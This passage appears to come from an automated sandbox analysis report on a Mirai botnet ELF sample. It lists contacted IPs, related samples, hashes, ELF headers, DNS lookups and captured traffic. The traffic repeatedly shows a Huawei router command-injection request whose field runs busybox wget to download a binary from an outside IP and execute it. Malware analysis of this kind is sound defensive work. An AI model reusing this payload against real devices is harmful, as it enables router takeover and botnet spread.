            41.251.80.199
            unknownMorocco
            36903MT-MPLSMAfalse
            219.135.22.50
            unknownChina
            4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
            37.157.105.6
            unknownEstonia
            3249ESTPAKEEfalse
            140.214.83.71
            unknownUnited States
            22284AS22284-DOI-OPSUSfalse
            157.37.189.61
            unknownIndia
            55836RELIANCEJIO-INRelianceJioInfocommLimitedINfalse
            49.145.111.158
            unknownPhilippines
            9299IPG-AS-APPhilippineLongDistanceTelephoneCompanyPHfalse
            48.57.45.81
            unknownUnited States
            2686ATGS-MMD-ASUSfalse
            90.30.222.127
            unknownFrance
            3215FranceTelecom-OrangeFRfalse
            41.255.246.91
            unknownLibyan Arab Jamahiriya
            21003GPTC-ASLYfalse
            194.93.206.139
            unknownGermany
            11757WHIRLPOOL-ASNUSfalse
            157.107.251.199
            unknownJapan4685ASAHI-NETAsahiNetJPfalse
            131.190.39.5
            unknownUnited States
            11003PANDGUSfalse
            74.156.26.161
            unknownUnited States
            7922COMCAST-7922USfalse
            2.21.254.61
            unknownEuropean Union
            34164AKAMAI-LONGBfalse
            157.5.74.121
            unknownunknown
            7671MCNETNTTSmartConnectCorporationJPfalse
            197.5.202.118
            unknownTunisia
            5438ATI-TNfalse
            41.205.177.120
            unknownunknown
            36974AFNET-ASCIfalse
            185.152.178.204
            unknownSweden
            1257TELE2EUfalse
            223.200.88.191
            unknownTaiwan; Republic of China (ROC)
            4782GSNETDataCommunicationBusinessGroupTWfalse
            115.179.146.98
            unknownJapan2519VECTANTARTERIANetworksCorporationJPfalse
            120.202.19.171
            unknownChina
            9808CMNET-GDGuangdongMobileCommunicationCoLtdCNfalse
            37.219.211.115
            unknownFinland
            16086DNAFIfalse
            197.108.90.208
            unknownSouth Africa
            37168CELL-CZAfalse
            17.121.8.240
            unknownUnited States
            714APPLE-ENGINEERINGUSfalse
            41.87.73.253
            unknownNigeria
            37248PHASE3TELNGfalse
            122.245.136.85
            unknownChina
            4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
            182.230.9.174
            unknownKorea Republic of
            17858POWERVIS-AS-KRLGPOWERCOMMKRfalse
            119.207.143.154
            unknownKorea Republic of
            4766KIXS-AS-KRKoreaTelecomKRfalse
            186.105.66.147
            unknownChile
            7418TELEFONICACHILESACLfalse
            157.63.24.147
            unknownJapan2907SINET-ASResearchOrganizationofInformationandSystemsNfalse
            52.134.247.190
            unknownUnited States
            63040HOSTZORSUSfalse
            18.175.16.29
            unknownUnited States
            16509AMAZON-02USfalse
            115.133.136.211
            unknownMalaysia
            4788TMNET-AS-APTMNetInternetServiceProviderMYfalse
            67.239.143.1
            unknownUnited States
            209CENTURYLINK-US-LEGACY-QWESTUSfalse
            197.184.140.161
            unknownSouth Africa
            37105NEOLOGY-ASZAfalse
            159.52.118.54
            unknownAustralia
            4826VOCUS-BACKBONE-ASVocusConnectInternationalBackboneAUfalse
            197.114.121.163
            unknownAlgeria
            36947ALGTEL-ASDZfalse
            66.7.38.159
            unknownUnited States
            7029WINDSTREAMUSfalse
            157.3.240.104
            unknownJapan7671MCNETNTTSmartConnectCorporationJPfalse
            144.214.163.82
            unknownHong Kong
            4158CITYU-AS-HKCityUniversityofHongKongHKfalse
            60.214.50.41
            unknownChina
            4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
            195.209.42.192
            unknownRussian Federation
            12722RECONNRUfalse
            41.122.162.178
            unknownSouth Africa
            16637MTNNS-ASZAfalse
            166.71.26.196
            unknownUnited States
            6315XMISSIONUSfalse
            148.189.45.154
            unknownUnited States
            42652DELUNETDEfalse
            212.33.206.148
            unknownIran (ISLAMIC Republic Of)
            43754ASIATECHIRfalse
            157.37.189.41
            unknownIndia
            55836RELIANCEJIO-INRelianceJioInfocommLimitedINfalse
            44.227.45.146
            unknownUnited States
            16509AMAZON-02USfalse
            199.57.247.158
            unknownUnited States
            721DNIC-ASBLK-00721-00726USfalse
            132.16.220.155
            unknownUnited States
            427AFCONC-BLOCK1-ASUSfalse
            98.105.199.45
            unknownUnited States
            6167CELLCO-PARTUSfalse
            104.15.97.46
            unknownUnited States
            7018ATT-INTERNET4USfalse
            159.65.0.151
            unknownUnited States
            14061DIGITALOCEAN-ASNUSfalse
            41.38.222.232
            unknownEgypt
            8452TE-ASTE-ASEGfalse
            41.214.134.108
            unknownMorocco
            36925ASMediMAfalse
            93.107.125.61
            unknownIreland
            15502VODAFONE-IRELAND-ASNIEfalse
            57.222.207.33
            unknownBelgium
            2686ATGS-MMD-ASUSfalse
            71.149.106.159
            unknownUnited States
            7018ATT-INTERNET4USfalse
            83.208.47.57
            unknownCzech Republic
            5610O2-CZECH-REPUBLICCZfalse
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            197.179.229.49fBPe0fde2V.elfGet hashmaliciousMiraiBrowse
              x86.elfGet hashmaliciousMirai, MoobotBrowse
                GXmCfFyiNNGet hashmaliciousMiraiBrowse
                  41.30.192.121x86.elfGet hashmaliciousMirai, MoobotBrowse
                    8rqhnVgyewGet hashmaliciousMiraiBrowse
                      153.160.179.489Y3FJARAlg.elfGet hashmaliciousMiraiBrowse
                        197.116.123.806hDUCLlfwu.elfGet hashmaliciousMirai, MoobotBrowse
                          C2PGPBRDOf.elfGet hashmaliciousMirai, MoobotBrowse
                            x86.elfGet hashmaliciousMirai, MoobotBrowse
                              i32be5jyrl.elfGet hashmaliciousMiraiBrowse
                                OxjB95ogxTGet hashmaliciousMiraiBrowse
                                  67.215.233.1huhu.arm.elfGet hashmaliciousMirai, OkiruBrowse
                                    41.121.55.94n1KcIudzlI.elfGet hashmaliciousMiraiBrowse
                                      P5Gbc41UN8.elfGet hashmaliciousMiraiBrowse
                                        79.71.144.147MR1WcAKdlh.elfGet hashmaliciousMiraiBrowse
                                          No context
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          ICT-AS-APAnppleTechEnterpriseMYskt.m68k.elfGet hashmaliciousMiraiBrowse
                                          • 205.199.62.89
                                          TxXQ106ErI.elfGet hashmaliciousMiraiBrowse
                                          • 196.53.141.7
                                          nnrBAc4RLp.elfGet hashmaliciousMiraiBrowse
                                          • 205.199.62.90
                                          O93vO719Sn.elfGet hashmaliciousUnknownBrowse
                                          • 205.198.236.74
                                          ZcOjro0Chh.elfGet hashmaliciousMiraiBrowse
                                          • 205.199.62.17
                                          TaNoeG7qKG.elfGet hashmaliciousMiraiBrowse
                                          • 205.198.80.24
                                          kGbjOmkleq.elfGet hashmaliciousMiraiBrowse
                                          • 205.199.37.82
                                          VRRoiuUVMq.elfGet hashmaliciousUnknownBrowse
                                          • 205.199.86.235
                                          mWkws6AHZd.elfGet hashmaliciousMiraiBrowse
                                          • 205.198.24.197
                                          fZZgQUTO36.elfGet hashmaliciousMiraiBrowse
                                          • 205.199.62.58
                                          ATT-CERFNET-BLOCKUSQH1v8Gya9C.elfGet hashmaliciousUnknownBrowse
                                          • 12.129.210.100
                                          3LI2VAvf26.elfGet hashmaliciousUnknownBrowse
                                          • 63.240.110.146
                                          mC7Qm2oo1D.elfGet hashmaliciousUnknownBrowse
                                          • 135.15.74.111
                                          jew.arm7.elfGet hashmaliciousMiraiBrowse
                                          • 199.105.250.130
                                          http://maryland.gov/Get hashmaliciousUnknownBrowse
                                          • 206.16.194.216
                                          jslLfC6rf3.elfGet hashmaliciousMiraiBrowse
                                          • 12.131.202.131
                                          Yui1pUgieI.elfGet hashmaliciousMiraiBrowse
                                          • 63.240.109.243
                                          VOlsbvDoA0.elfGet hashmaliciousMiraiBrowse
                                          • 12.129.210.104
                                          ayejQ3Qo2k.elfGet hashmaliciousMiraiBrowse
                                          • 135.13.252.238
                                          3FWcPHiVPC.elfGet hashmaliciousMiraiBrowse
                                          • 134.24.206.72
                                          SAFARICOM-LIMITEDKEEZPrs0LSHV.elfGet hashmaliciousMiraiBrowse
                                          • 41.91.11.101
                                          skt.mips.elfGet hashmaliciousMiraiBrowse
                                          • 197.178.216.239
                                          skt.m68k.elfGet hashmaliciousMiraiBrowse
                                          • 41.90.0.247
                                          L6i3RnSvpp.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                          • 197.179.230.72
                                          BsQruPrJVe.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                          • 197.177.40.140
                                          KlgUGKamBf.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                          • 197.179.81.200
                                          wO2hW34tnC.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                          • 197.179.230.14
                                          Mt5VyD087r.elfGet hashmaliciousMiraiBrowse
                                          • 197.177.39.232
                                          i6bCVSCWc1.elfGet hashmaliciousMiraiBrowse
                                          • 197.177.27.87
                                          Pvq4zSr7yY.elfGet hashmaliciousUnknownBrowse
                                          • 196.108.245.67
                                          VODACOM-ZAEZPrs0LSHV.elfGet hashmaliciousMiraiBrowse
                                          • 41.23.40.233
                                          skt.arm4.elfGet hashmaliciousMiraiBrowse
                                          • 41.11.91.56
                                          skt.arm7.elfGet hashmaliciousMiraiBrowse
                                          • 41.6.232.105
                                          skt.arm6.elfGet hashmaliciousMiraiBrowse
                                          • 41.19.159.156
                                          skt.sh4.elfGet hashmaliciousMiraiBrowse
                                          • 41.14.115.112
                                          skt.spc.elfGet hashmaliciousMiraiBrowse
                                          • 156.22.157.77
                                          1M7tN5L38L.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                          • 41.3.198.133
                                          D8toi0qM9J.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                          • 41.3.47.187
                                          abkzsHZ00o.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                          • 156.49.159.13
                                          xc1gRf4odZ.elfGet hashmaliciousMirai, OkiruBrowse
                                          • 41.23.40.211
                                          OCNNTTCommunicationsCorporationJPskt.mips.elfGet hashmaliciousMiraiBrowse
                                          • 157.64.243.82
                                          skt.m68k.elfGet hashmaliciousMiraiBrowse
                                          • 60.38.65.50
                                          skt.x86.elfGet hashmaliciousMiraiBrowse
                                          • 125.174.239.167
                                          skt.spc.elfGet hashmaliciousMiraiBrowse
                                          • 114.162.55.134
                                          bPnq1YMDrf.elfGet hashmaliciousMirai, OkiruBrowse
                                          • 153.222.3.182
                                          KlgUGKamBf.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                          • 180.38.220.54
                                          xc1gRf4odZ.elfGet hashmaliciousMirai, OkiruBrowse
                                          • 61.127.213.113
                                          Ixq2ypphWQ.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                          • 153.149.62.187
                                          QH1v8Gya9C.elfGet hashmaliciousUnknownBrowse
                                          • 114.161.164.255
                                          nzKl7TpAyk.elfGet hashmaliciousUnknownBrowse
                                          • 123.224.122.247
                                          No context
                                          No context
                                          No created / dropped files found
                                          File type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
                                          Entropy (8bit):6.414809233940425
                                          TrID:
                                          • ELF Executable and Linkable format (Linux) (4029/14) 50.16%
                                          • ELF Executable and Linkable format (generic) (4004/1) 49.84%
                                          File name:x86.nn.elf
                                          File size:46'576 bytes
                                          MD5:df009b3d666e3ae272b1ae1a5f0df341
                                          SHA1:02cdbe0036ebfae8dae8e2fbf17f1ac51ca364a4
                                          SHA256:c7dbab1e4dcfb49f3cf5d0bb0a743a400ec3719a0c40494c74078e27eda1e065
                                          SHA512:888b04606bfcd638f34ec522c245e2370bc7721a4c126136e6c1518dc1a8ec897e1f03873746a57b8819cb01247d2e4c1da2296b6a1460ce8b5664dc3245a61a
                                          SSDEEP:768:T8/MjSNW4GBs82WETRRjBWVbFoQGpYHg+ZdG:T8/MjSNW4GBz3EtcbxcYHhZdG
                                          TLSH:BA233AC89643E9F5EC111A712077FB324B37F17A512AFE87D365A932AC41B11A20B2DD
                                          File Content Preview:.ELF....................d...4...`.......4. ...(.....................`...`...............d...dB..dB..................Q.td............................U..S............h........[]...$.............U......= D...t..5.....B......B......u........t....h`2..........

                                          ELF header

                                          Class:ELF32
                                          Data:2's complement, little endian
                                          Version:1 (current)
                                          Machine:Intel 80386
                                          Version Number:0x1
                                          Type:EXEC (Executable file)
                                          OS/ABI:UNIX - System V
                                          ABI Version:0
                                          Entry Point Address:0x8048164
                                          Flags:0x0
                                          ELF Header Size:52
                                          Program Header Offset:52
                                          Program Header Size:32
                                          Number of Program Headers:3
                                          Section Header Offset:46176
                                          Section Header Size:40
                                          Number of Section Headers:10
                                          Header String Table Index:9
                                          NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                          NULL0x00x00x00x00x0000
                                          .initPROGBITS0x80480940x940x1c0x00x6AX001
                                          .textPROGBITS0x80480b00xb00xa7060x00x6AX0016
                                          .finiPROGBITS0x80527b60xa7b60x170x00x6AX001
                                          .rodataPROGBITS0x80527e00xa7e00xa800x00x2A0032
                                          .ctorsPROGBITS0x80542640xb2640x80x00x3WA004
                                          .dtorsPROGBITS0x805426c0xb26c0x80x00x3WA004
                                          .dataPROGBITS0x80542a00xb2a00x1800x00x3WA0032
                                          .bssNOBITS0x80544200xb4200x6000x00x3WA0032
                                          .shstrtabSTRTAB0x00xb4200x3e0x00x0001
                                          TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                          LOAD0x00x80480000x80480000xb2600xb2606.43790x5R E0x1000.init .text .fini .rodata
                                          LOAD0xb2640x80542640x80542640x1bc0x7bc4.88940x6RW 0x1000.ctors .dtors .data .bss
                                          GNU_STACK0x00x00x00x00x00.00000x6RW 0x4
                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                          May 28, 2024 14:46:51.086281061 CEST192.168.2.238.8.8.80x9091Standard query (0)telnet.8b8n.comA (IP address)IN (0x0001)false
                                          May 28, 2024 14:46:52.741219997 CEST192.168.2.238.8.8.80x522cStandard query (0)telnet.8b8n.comA (IP address)IN (0x0001)false
                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                          May 28, 2024 14:46:51.100111008 CEST8.8.8.8192.168.2.230x9091No error (0)telnet.8b8n.com91.92.249.80A (IP address)IN (0x0001)false
                                          May 28, 2024 14:46:52.751821041 CEST8.8.8.8192.168.2.230x522cNo error (0)telnet.8b8n.com91.92.249.80A (IP address)IN (0x0001)false
                                          Session IDSource IPSource PortDestination IPDestination Port
                                          0192.168.2.2351164197.19.68.20037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.102176905 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1192.168.2.2336202197.108.98.8137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.102190971 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2192.168.2.2347496157.22.232.4437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.102233887 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3192.168.2.235032241.217.239.12537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.102233887 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4192.168.2.2356392197.11.136.20037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.102236986 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5192.168.2.2354126162.189.159.9737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.102250099 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
